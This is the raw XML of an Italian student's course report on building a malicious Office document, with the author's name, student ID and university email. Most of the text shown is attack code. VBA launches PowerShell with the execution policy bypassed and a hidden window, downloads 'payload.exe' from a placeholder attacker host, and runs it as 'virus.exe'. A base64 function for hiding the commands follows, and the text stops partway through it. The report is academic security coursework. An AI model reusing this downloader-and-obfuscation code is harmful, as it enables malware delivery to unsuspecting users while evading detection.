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38D3" w14:textId="18A87FCD" w:rsidR="002214D0" w:rsidRPr="00D1660C" w:rsidRDefault="003D71C6" w:rsidP="003D71C6">
      <w:pPr>
        <w:pStyle w:val="Titolo"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>REPORT DOCUMENTO MALEVOLO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C0AF9C" w14:textId="77777777" w:rsidR="003D71C6" w:rsidRPr="00D1660C" w:rsidRDefault="003D71C6" w:rsidP="003D71C6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EF8DCE0" w14:textId="77777777" w:rsidR="003D71C6" w:rsidRPr="00D1660C" w:rsidRDefault="003D71C6" w:rsidP="003D71C6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C6004C7" w14:textId="257D8F29" w:rsidR="003D71C6" w:rsidRPr="00D1660C" w:rsidRDefault="003D71C6" w:rsidP="00387493">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Nome Cognome</w:t>
      </w:r>
      <w:r w:rsidR="00DD1CDD" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Farina Christian</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA03550" w14:textId="75E93E31" w:rsidR="003D71C6" w:rsidRPr="00D1660C" w:rsidRDefault="003D71C6" w:rsidP="00387493">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Matricola</w:t>
      </w:r>
      <w:r w:rsidR="00DD1CDD" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> VR501577</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0AFDCD" w14:textId="5C9AB962" w:rsidR="003D71C6" w:rsidRPr="00267F5A" w:rsidRDefault="003D71C6" w:rsidP="00387493">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00267F5A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Email</w:t>
      </w:r>
      <w:r w:rsidR="00DD1CDD" w:rsidRPr="00267F5A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> christian.farina@studenti.univr.it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F1FCD1" w14:textId="77777777" w:rsidR="003D71C6" w:rsidRPr="00267F5A" w:rsidRDefault="003D71C6" w:rsidP="003D71C6"/>
    <w:p w14:paraId="0D217D35" w14:textId="77777777" w:rsidR="003D71C6" w:rsidRPr="00267F5A" w:rsidRDefault="003D71C6" w:rsidP="003D71C6"/>
    <w:p w14:paraId="4FC7F742" w14:textId="4B7B28E8" w:rsidR="003D71C6" w:rsidRPr="00D1660C" w:rsidRDefault="003D71C6" w:rsidP="003D71C6">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>COMANDO POWERSHELL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F5717B" w14:textId="6F609D0D" w:rsidR="003D71C6" w:rsidRPr="00D1660C" w:rsidRDefault="003D71C6" w:rsidP="003D71C6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">In questa sezione dovete presentare il codice del comando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Powershel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> e le tecniche adottate per codificarlo in base 64.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214A3C87" w14:textId="294E138B" w:rsidR="003104B9" w:rsidRPr="00D1660C" w:rsidRDefault="003104B9" w:rsidP="003D71C6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t>COMANDI POWERSHELL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A88179F" w14:textId="5ACD921B" w:rsidR="001C0B72" w:rsidRPr="00D1660C" w:rsidRDefault="001C0B72" w:rsidP="003D71C6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 xml:space="preserve">' Mi collego al server creato con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:color w:val="92D050"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:color w:val="92D050"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> e scarico il file malevolo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA8DF82" w14:textId="616CDD2F" w:rsidR="003104B9" w:rsidRPr="00D1660C" w:rsidRDefault="003104B9" w:rsidP="003104B9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>comandoDaEseguire</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">= "(New-Object </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Net.WebClient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>DownloadFile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>('" &amp; "http://</w:t>
      </w:r>
      <w:r w:rsidR="00B046EC" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>ipattaccante</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00B046EC" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>porta</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>/payload.exe" &amp; "', '" &amp; "</w:t>
      </w:r>
      <w:r w:rsidR="00B046EC" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">percorso\dove\voglio\salvare\virus.exe </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>" &amp; "')"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F67A99D" w14:textId="0908738D" w:rsidR="003104B9" w:rsidRPr="00D1660C" w:rsidRDefault="003104B9" w:rsidP="003104B9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>comandoDaEseguire2= " &amp; 'percorso\dove\è\salvato\virus.exe'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0D8C1B" w14:textId="42778151" w:rsidR="003104B9" w:rsidRPr="00D1660C" w:rsidRDefault="003104B9" w:rsidP="003104B9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 xml:space="preserve">' Esegui il comando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:color w:val="92D050"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:color w:val="92D050"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> per scaricare il file malevolo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCCD5DD" w14:textId="536A41F0" w:rsidR="003104B9" w:rsidRDefault="003104B9" w:rsidP="003104B9">
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>shell.Run</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> "powershell.exe -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NoProfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ExecutionPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Bypass -Command " &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>comandoDaEseguire</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, 0, True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C367CB0" w14:textId="07EAB4A4" w:rsidR="003104B9" w:rsidRPr="00D1660C" w:rsidRDefault="003104B9" w:rsidP="003104B9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 xml:space="preserve">' Esegui il comando </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:color w:val="92D050"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:color w:val="92D050"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> per eseguire il file malevolo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40197322" w14:textId="315A4315" w:rsidR="003104B9" w:rsidRDefault="003104B9" w:rsidP="003104B9">
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>shell.Run</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> "powershell.exe -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NoProfile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ExecutionPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Bypass -Command " &amp; comandoDaEseguire2, 0, True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D01C96" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="003104B9"/>
    <w:p w14:paraId="3136A730" w14:textId="67EEAB4B" w:rsidR="003104B9" w:rsidRPr="00D1660C" w:rsidRDefault="003104B9" w:rsidP="003104B9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t>TECNICHE DI CODIFICA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAF0FB1" w14:textId="383BA465" w:rsidR="003104B9" w:rsidRPr="00D1660C" w:rsidRDefault="003104B9" w:rsidP="003104B9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Per la codifica ho utilizzato due metodi in VBA che codificano stringh</w:t>
      </w:r>
      <w:r w:rsidR="00B046EC" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> date in input, in un contest reale le stringhe sarebbero state date</w:t>
      </w:r>
      <w:r w:rsidR="001C0B72" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>direttamente codificate</w:t>
      </w:r>
      <w:r w:rsidR="001C0B72" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> come input </w:t>
      </w:r>
      <w:r w:rsidR="001C0B72" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>al</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> decodificatore di </w:t>
      </w:r>
      <w:r w:rsidR="00D1660C" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>VBA; tuttavia,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> per </w:t>
      </w:r>
      <w:r w:rsidR="001C0B72" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>motivi</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> didattici ho inserito I due metodi all’interno del codice del file malevolo</w:t>
      </w:r>
      <w:r w:rsidR="001C0B72" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> per mostrarne il funzionamento. Il programma infatti esegue I seguenti passaggi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA9E15E" w14:textId="1A284A3F" w:rsidR="003104B9" w:rsidRPr="00D1660C" w:rsidRDefault="001C0B72" w:rsidP="003104B9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="003104B9" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Codifica le stringhe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F5049C" w14:textId="3DC70129" w:rsidR="003104B9" w:rsidRPr="00D1660C" w:rsidRDefault="001C0B72" w:rsidP="003104B9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="003104B9" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Decodifica le stringhe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1597405E" w14:textId="6C0E2C01" w:rsidR="003104B9" w:rsidRPr="00D1660C" w:rsidRDefault="001C0B72" w:rsidP="003104B9">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="003104B9" w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Esegue I comandi decodificati</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E46305" w14:textId="6412F9CC" w:rsidR="00B046EC" w:rsidRPr="00D1660C" w:rsidRDefault="00B046EC" w:rsidP="003104B9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lastRenderedPageBreak/>
        <w:t>METODI USATI PER CODIFICARE I COMANDI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B188209" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRPr="00D1660C" w:rsidRDefault="00B046EC" w:rsidP="00B046EC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>' codifica una stringa in input in base 64 e restituisce la stringa codificata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56416919" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRPr="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r w:rsidRPr="00B046EC">
        <w:t>Function EncodeBase64(str As String) As String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2669D3BA" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRPr="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r w:rsidRPr="00B046EC">
        <w:t xml:space="preserve">    Dim </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B046EC">
        <w:t>objXML</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B046EC">
        <w:t xml:space="preserve"> As Object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3930455B" w14:textId="3E1592AA" w:rsidR="00B046EC" w:rsidRPr="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r w:rsidRPr="00B046EC">
        <w:t xml:space="preserve">    Dim </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B046EC">
        <w:t>objNode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B046EC">
        <w:t xml:space="preserve"> As Object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE17C38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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B046EC">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>Crea</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B046EC">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t xml:space="preserve"> un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B046EC">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t>oggetto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B046EC">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t xml:space="preserve"> XML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646720BF" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRPr="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r w:rsidRPr="00B046EC">
        <w:t xml:space="preserve">    Set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B046EC">
        <w:t>objXML</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B046EC">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B046EC">
        <w:t>CreateObject</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B046EC">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B046EC">
        <w:t>"MSXML2.DOMDocument")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA8C13C" w14:textId="03723921" w:rsidR="00B046EC" w:rsidRPr="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r w:rsidRPr="00B046EC">
        <w:t xml:space="preserve">    Set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B046EC">
        <w:t>objNode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B046EC">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B046EC">
        <w:t>objXML.createElement</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B046EC">
        <w:t>("b64")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370A2664" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRPr="00D1660C" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="92D050"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B046EC">
        <w:rPr>
          <w:color w:val="92D050"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:color w:val="92D050"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>' Imposta il testo del nodo con il comando da codificare</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6F8D17" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRPr="00D1660C" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>objNode.dataType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> = "bin.base64"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730DCB4F" w14:textId="409A1ECC" w:rsidR="00B046EC" w:rsidRPr="00D1660C" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>objNode.nodeTypedValue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>stringaABinario</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>str</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733D89FC" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRPr="00D1660C" w:rsidRDefault="00B046EC" w:rsidP="00B046EC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 xml:space="preserve">    ' Restituisci il risultato della codifica base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257805B5" w14:textId="50481B66" w:rsidR="00B046EC" w:rsidRPr="00D1660C" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">    EncodeBase64 = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>objNode.text</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="087FB0BF" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRPr="00D1660C" w:rsidRDefault="00B046EC" w:rsidP="00B046EC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 xml:space="preserve">    ' Libera l'oggetto XML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AC4783" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRPr="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00B046EC">
        <w:t xml:space="preserve">Set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B046EC">
        <w:t>objNode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B046EC">
        <w:t xml:space="preserve"> = Nothing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4021F0" w14:textId="77777777" w:rsidR="00B046EC" w:rsidRPr="00B046EC" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:r w:rsidRPr="00B046EC">
        <w:t xml:space="preserve">    Set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B046EC">
        <w:t>objXML</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B046EC">
        <w:t xml:space="preserve"> = Nothing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C84630C" w14:textId="0062DA9E" w:rsidR="00B046EC" w:rsidRPr="00D1660C" w:rsidRDefault="00B046EC" w:rsidP="00B046EC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D1660C">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
